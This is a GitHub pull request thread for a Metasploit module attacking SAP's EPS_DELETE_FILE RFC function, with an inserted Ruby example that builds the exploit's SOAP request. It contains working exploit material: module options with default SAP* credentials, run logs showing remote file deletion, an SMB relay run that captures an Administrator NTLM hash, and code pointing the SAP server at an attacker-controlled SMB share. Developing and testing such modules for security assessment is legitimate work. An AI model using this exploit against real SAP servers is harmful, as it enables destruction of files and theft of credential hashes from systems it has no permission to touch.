
EPS_DELETE_FILE (File Deletion and SMB Relay) #1659

Merged
merged 1 commit

2 participants

nmonkee Juan Vazquez
nmonkee

A vulnerability in the SAP EPS_DELETE_FILE RFC function allows an attacker to delete files remotely and/or steal hashes using an SMB relay attack.

SAP Note 1554030 / DSECRG-11-031.

ref: http://dsecrg.com/pages/vul/show.php?id=331

jvazquez-r7 referenced this pull request in nmonkee/metasploit-framework:
Cleanup for sap_soap_rfc_eps_delete_file #7 (Merged)

Juan Vazquez
Collaborator

Hi @nmonkee,

The pull request nmonkee#7 is applying the same changes proposed on the last pull requests such as #1658, plus it is moving the module to the "dos" tree, because a file deletion module is a dos module indeed. Even when it also helps to make SMBRelay attacks, it can also be done by other auxiliary scanner modules, so I think auxiliary/dos/sap is the correct place for this module. As always feel free to review, test, ask, discuss anything and merge nmonkee#7 on your repo when ready. So this pull request will be automatically updated and we'll be ready to merge :)

Testing after changes:

msf auxiliary(sap_soap_rfc_eps_delete_file) > show options

Module options (auxiliary/dos/sap/sap_soap_rfc_eps_delete_file):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CLIENT    001              yes       SAP Client
   DIRNAME   /tmp             yes       Directory Path which contains the file to delete
   FILENAME  msf.txt          yes       Filename to delete
   PASSWORD  06071992         yes       Password
   Proxies                    no        Use a proxy chain
   RHOSTS                     yes       The target address range or CIDR identifier
   RPORT     80               yes       The target port
   THREADS   1                yes       The number of concurrent threads
   USERNAME  SAP*             yes       Username
   VHOST                      no        HTTP server virtual host

msf auxiliary(sap_soap_rfc_eps_delete_file) > run

[+] 192.168.172.179:8042 - File msf.txt at /tmp successfully deleted
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

nmonkee

Not that I am that fussed, but it seems that this error is received and the file is not deleted on Linux and Windows. However, it makes it an ineffective DoS module ;)


<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/">
  <SOAP-ENV:Body>
    <SOAP-ENV:Fault>
      <faultcode>SOAP-ENV:Client</faultcode>
      <faultstring>DELETE_FAILED</faultstring>
      <detail>
        <rfc:EPS_DELETE_FILE.Exception xmlns:rfc="urn:sap-com:document:sap:rfc:functions">
          <Name>DELETE_FAILED</Name>
        </rfc:EPS_DELETE_FILE.Exception>
      </detail>
    </SOAP-ENV:Fault>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>

SMB Relay works fine:


msf auxiliary(sap_soap_rfc_eps_delete_file) > run
[*] 192.168.1.86:8000 - Sending request to delete msf.txt at \\192.168.1.71\foo
[*] SMB Captured - 2013-05-09 21:20:07 +0100
NTLMv1 Response Captured from 192.168.1.86:50768 - 192.168.1.86 
USER:Administrator DOMAIN:GATEWAY OS: LM:
LMHASH:Disabled 
NTHASH:d9d3c192407bc93152376e16d6a3a3fa9aa53b3cf940f8d4
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
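The RFC call behind the module, as an added example that is not the module's own code (nor SAP's): it builds the SOAP-RFC request for EPS_DELETE_FILE with either a local directory or a UNC path (the SMB relay variant shown in the run above) and classifies the server's reply, using the DELETE_FAILED fault posted earlier in the thread as one of its samples. The DIR_NAME/FILE_NAME parameter names, the /sap/bc/soap/rfc endpoint with its sap-client query parameter, and the shape of the success reply are assumptions; the fault sample is the one from the thread, the success sample is constructed.

```ruby
# Added example, not the Metasploit module's code. Builds the SOAP-RFC call
# for EPS_DELETE_FILE and classifies the SAP reply. Assumed (not from the
# thread): the DIR_NAME/FILE_NAME parameter names, the /sap/bc/soap/rfc
# endpoint with its sap-client query parameter, and the shape of a success
# response. The fault sample below is the one posted in the thread.
require 'rexml/document'

SOAP_ENV = 'http://schemas.xmlsoap.org/soap/envelope/'.freeze
RFC_NS   = 'urn:sap-com:document:sap:rfc:functions'.freeze

# Minimal XML text escaping so an odd or hostile file name cannot break
# out of the DIR_NAME / FILE_NAME elements.
def xml_escape(str)
  str.to_s.gsub('&', '&amp;').gsub('<', '&lt;').gsub('>', '&gt;').gsub('"', '&quot;')
end

# SOAP body for the RFC. dir_name is either a server-local directory
# (/tmp, c:\) or a UNC path (\\attacker\share); the latter makes the SAP
# host open an SMB session to the attacker, which is the hash-capture /
# relay variant shown in the thread.
def eps_delete_file_envelope(dir_name, file_name)
  <<~XML
    <?xml version="1.0" encoding="utf-8"?>
    <env:Envelope xmlns:env="#{SOAP_ENV}">
      <env:Body>
        <n1:EPS_DELETE_FILE xmlns:n1="#{RFC_NS}">
          <DIR_NAME>#{xml_escape(dir_name)}</DIR_NAME>
          <FILE_NAME>#{xml_escape(file_name)}</FILE_NAME>
        </n1:EPS_DELETE_FILE>
      </env:Body>
    </env:Envelope>
  XML
end

# UNC directory pointing the SAP server at an attacker-controlled SMB
# listener (the share name is arbitrary; the listener only needs the
# NTLM authentication attempt).
def smb_relay_dir(attacker_ip, share = 'foo')
  "\\\\#{attacker_ip}\\#{share}"
end

# Everything an HTTP client needs for the call (no socket is opened here).
# Basic auth against the SOAP RFC handler, as the module's USERNAME /
# PASSWORD options imply; sap-client selects the SAP client (assumed endpoint).
def eps_delete_file_request(host, port, client, user, pass, dir_name, file_name)
  {
    method:  'POST',
    uri:     "http://#{host}:#{port}/sap/bc/soap/rfc?sap-client=#{client}",
    headers: {
      'Content-Type'  => 'text/xml; charset=UTF-8',
      'Authorization' => 'Basic ' + ["#{user}:#{pass}"].pack('m0')
    },
    body: eps_delete_file_envelope(dir_name, file_name)
  }
end

# Classify the reply: [:deleted, nil] on an EPS_DELETE_FILE.Response,
# [:fault, NAME] on a SOAP fault (NAME from the RFC exception, falling back
# to faultstring), [:unknown, nil] for anything else (HTML error page,
# truncated or non-XML body).
def classify_response(xml)
  doc  = REXML::Document.new(xml)
  body = REXML::XPath.first(doc, '//env:Body', 'env' => SOAP_ENV)
  return [:unknown, nil] unless body

  fault = REXML::XPath.first(body, 'env:Fault', 'env' => SOAP_ENV)
  if fault
    name = REXML::XPath.first(fault, './/Name') || REXML::XPath.first(fault, 'faultstring')
    return [:fault, name ? name.text.to_s.strip : 'UNKNOWN']
  end

  first = body.elements.to_a.first
  if first && first.name == 'EPS_DELETE_FILE.Response' && first.namespace == RFC_NS
    [:deleted, nil]
  else
    [:unknown, nil]
  end
rescue REXML::ParseException
  [:unknown, nil]
end

# Fault reply as posted in the thread (DELETE_FAILED, which the thread traced
# to file-name case and file ownership), on one line as the server sent it.
SAMPLE_FAULT_RESPONSE = '<?xml version="1.0" encoding="UTF-8"?>' \
  '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" ' \
  'xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body>' \
  '<SOAP-ENV:Fault><faultcode>SOAP-ENV:Client</faultcode><faultstring>DELETE_FAILED</faultstring>' \
  '<detail><rfc:EPS_DELETE_FILE.Exception xmlns:rfc="urn:sap-com:document:sap:rfc:functions">' \
  '<Name>DELETE_FAILED</Name></rfc:EPS_DELETE_FILE.Exception></detail></SOAP-ENV:Fault>' \
  '</SOAP-ENV:Body></SOAP-ENV:Envelope>'

# Constructed success reply (assumed shape: an empty EPS_DELETE_FILE.Response).
SAMPLE_SUCCESS_RESPONSE = '<?xml version="1.0" encoding="UTF-8"?>' \
  '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"><SOAP-ENV:Body>' \
  '<rfc:EPS_DELETE_FILE.Response xmlns:rfc="urn:sap-com:document:sap:rfc:functions"/>' \
  '</SOAP-ENV:Body></SOAP-ENV:Envelope>'

if __FILE__ == $PROGRAM_NAME
  req = eps_delete_file_request('192.168.1.86', 8000, '001', 'SAP*', 'password',
                                smb_relay_dir('192.168.1.71'), 'msf.txt')
  puts req[:body]
  p classify_response(SAMPLE_FAULT_RESPONSE)
  p classify_response(SAMPLE_SUCCESS_RESPONSE)
end
```

Point DIR_NAME at a share on a host running an SMB capture or relay listener and the SAP server authenticates to it under the account the instance runs as (Administrator in the capture above), whether or not any file exists there. A DELETE_FAILED fault on a local path is worth retrying with the exact case of the file name and after checking who owns the file, since both affected the tests in this thread.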

Juan Vazquez
Collaborator

No, it's important, checking....

nmonkee

A search on the error suggests case sensitivity is important.

Juan Vazquez
Collaborator

Working as expected when the owner of the file to delete is npladm

msf auxiliary(sap_soap_rfc_eps_delete_file) > run

[*] 192.168.172.179:8042 - Sending request to delete w00t at /tmp/
[+] 192.168.172.179:8042 - File w00t at /tmp/ successfully deleted
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

merging!

jvazquez-r7 referenced this pull request from a commit:
Land #1659, @nmonkee's sap_soap_rfc_eps_delete_file module (3e1d1a3)

jvazquez-r7 merged commit 7ad73d8
nmonkee deleted the branch
Juan Vazquez
Collaborator

Checking on windows!

Juan Vazquez
Collaborator

Fixed the error on windows:

msf auxiliary(sap_soap_rfc_eps_delete_file) > reload
[*] Reloading module...
msf auxiliary(sap_soap_rfc_eps_delete_file) > run

[*] 192.168.172.185:8000 - Sending request to delete foo.txt at c:\
[+] 192.168.172.185:8000 - File foo.txt at c:\ successfully deleted
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

See: d37d211

Commits on May 9, 2013
  1. Merge pull request #7 from jvazquez-r7/sap_soap_rfc_eps_delete_file
     Cleanup for sap_soap_rfc_eps_delete_file
     (nmonkee authored)